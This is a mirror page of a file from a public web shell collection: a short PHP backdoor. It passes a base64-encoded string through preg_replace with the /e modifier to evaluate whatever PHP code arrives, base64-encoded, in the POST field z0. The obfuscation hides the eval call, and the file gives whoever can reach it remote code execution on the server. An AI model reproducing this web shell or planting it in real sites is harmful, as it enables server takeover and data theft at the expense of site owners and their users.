mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
7 lines
153 B
PHP
7 lines
153 B
PHP
|
<?php
|
||
|
@$a = $_POST['x'];
|
||
|
if(isset($a)){
|
||
|
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
|
||
|
}
|
||
|
?>
|